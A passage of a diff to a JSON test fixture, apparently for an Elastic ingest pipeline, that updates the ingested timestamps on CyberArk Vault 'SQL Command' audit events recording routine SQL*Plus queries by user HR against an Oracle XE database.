END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683112Z", + "ingested": "2021-12-14T14:42:26.430585418Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -459,7 +459,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683116100Z", + "ingested": "2021-12-14T14:42:26.430587305Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -578,7 +578,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683121400Z", + "ingested": "2021-12-14T14:42:26.430587804Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -697,7 +697,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683125200Z", + "ingested": "2021-12-14T14:42:26.430588233Z", "original": "\u003c5\u003e1 2021-03-25T14:56:45Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:45\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:45Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT DECODE('A','A','1','2') FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:45\",\"IsoTimestamp\":\"2021-03-25T14:56:45Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT DECODE('A','A','1','2') FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -816,7 +816,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683128900Z", + "ingested": "2021-12-14T14:42:26.430588620Z", "original": "\u003c5\u003e1 2021-03-25T14:56:54Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" 